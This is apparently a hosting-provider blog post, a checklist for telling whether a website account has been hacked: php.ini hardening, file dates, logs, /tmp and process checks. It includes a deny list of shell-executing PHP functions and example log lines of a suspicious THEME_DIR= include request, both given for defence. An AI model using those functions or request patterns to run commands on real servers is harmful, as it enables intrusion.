HOW TO: Know if You’ve Been Hacked

I frequently cleaned cracked WestHost accounts, but sometimes they are not actually cracked or it’s a little hard to track down.
Here is a guide for what to look for if you think that something might be compromised. Some of this information is for WestHost accounts purchased before Nov. 2009, but I’ve included things to cover other accounts so it can translate into additional systems, platforms and hosts.

  1. Location, Location, Location

  2. Where is the malicious content initially found? 9 times out of 10 it’ll be in a sub-location of a specific PHP application. And that application is usually the one that was exploited.

  3. PHP Variables
  4. Below are common exploited functions within PHP. Ensure the below 3 are disabled if at all possible [or just enabled for the necessary directory].
    Quick check of /etc/php.ini variables
    disable_functions = passthru,proc_open,shell_exec,system //Ensure these are in the list
    register_globals = Off
    allow_url_fopen = Off
    allow_url_include = Off
    While shared accounts in the cPanel system do not have access to the server level php.ini file, you can utilize local PHP configuration files. Here’s a great link from to a forum post with information on how to do so:

  5. Modification Dates
  6. What are the modification times on the files? This is very important as it lets you know how old the hack is. If you know when it was put there then you can examine log files for anything suspicious at that time.

  7. Got POST?
  8. Look for pages that have been posted to the most within Apache logs. Typically if there is a backdoor shell it’ll show up in the list.

  9. Check for Strange Files in /tmp
  10. This is a common location for crackers to stick scripts.

  11. Check Your Process List for Anything Suspicious
  12. If you see something, either install lsof and take a look at where it’s executing from or, contact us to check for you.
    Shared cPanel users will likely just want to contact Technical Support.

  13. Know Your Log Files
  14. Do you know how to enable ftp logs? Where they are kept? bash_history? access_log’s? error_logs? Check them all.
    cPanel provides access to the Apache log, but you can also trail system logs via SSH.

  15. Run Some Command Line Checks
  16. Run the command below and look for any strange GET requests.
    awk -F ‘”‘ ‘{print $2}’ /var/log/httpd/access_log | grep -E ‘/?’ | less
    Example: GET /domain.html/default/theme.php?THEME_DIR= HTTP/1.1
    GET /default/theme.php?THEME_DIR=
    This command will work from the shared cPanel accounts.

  17. Document
  18. Always document everything you’ve seen and everything you find and everything you do. If you have backups to restore your site, ensure that you save a copy of the hacked files, remove their permissions, and let Tech Support run a final check of the files in question.

  19. Google’s Your Friend
  20. Chances are if someone has been hacked, it’s happened a million times over to others running the same application. Typically there are posts on possible entry points, etc.

  21. Repetition, Repetition, Repetition
  22. Hackers like to repeat things. Why? Because they use scripts to do their work for them. So if you find one instance check for others in other files.

I realize some of this may seem quite technical so please comment with your questions.
This could be expanded, but these steps are good places to check if you are worried about your account’s security. Have any other tricks you’d like to impart now?